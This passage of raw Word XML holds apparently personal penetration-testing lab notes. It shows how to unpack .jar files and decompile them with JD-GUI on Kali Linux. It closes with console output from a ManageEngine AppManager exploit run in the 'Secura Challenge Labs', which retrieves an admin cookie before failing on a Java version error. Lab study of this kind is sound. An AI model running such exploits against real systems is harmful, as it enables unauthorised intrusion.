      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">unzip </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">command to unzip the .jar:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000350F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you use JD-GUI, you don't have to UNZIP! You can view contents inside of .jar files directly using JD-GUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003510">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="543"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You should see the .class files, META-INF directory (with the MANIFEST.MF file), and any other resources included</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003511">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003512">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">META-INF:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003513">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To read</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003514">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat META-INF/MANIFEST.MF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003515">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat META-INF/*.SF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003516">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat META-INF/*.DSA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003517">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1133"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings META-INF/MANIFEST.MF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003518">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003519">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Steps to Use JD-GUI on Kali Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download JD-GUI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Visit the official JD-GUI site and download the Linux version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - http://java-decompiler.github.io/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000351F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003520">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Alternatively, use `wget` to download:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003521">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> wget https://github.com/java-decompiler/jd-gui/releases/download/v1.6.6/jd-gui-1.6.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003522">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003523">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. I</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nstall Java (if not already installed)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003524">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003525">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   sudo apt update</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003526">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   sudo apt install openjdk-11-jdk</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003527">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003528">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003529">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run JD-GUI</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   Launch JD-GUI using the downloaded `.jar` file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1109"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">java -jar jd-gui-1.6.6.jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the `.jar` File</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000352F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Once JD-GUI opens, click on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">File &gt; Open File</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and select your `.jar` file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003530">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - JD-GUI will display all the `.class` files within the archive in a tree structure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003531">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003532">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Decompiled Code</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003533">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - Click on any `.class` file to view the decompiled Java source code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003534">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   - You can explore the logic and structure of the program easily.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003535">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003536">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—----------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003537">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003538">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Secura Challenge Labs, I think we are supposed to use an exploit against Manage Engine that involves .jar</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003539">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1142">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">exploit</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, when I ran it, I got this error:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Visiting page to retrieve initial cookies...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Retrieving admin cookie...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Getting base directory of ManageEngine...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000353F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Found base directory: C:\Program Files\ManageEngine\AppManager14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003540">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Creating JAR file...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003541">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">error: release version 7 not supported</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003542">
      <w:pPr>
        <w:rPr>
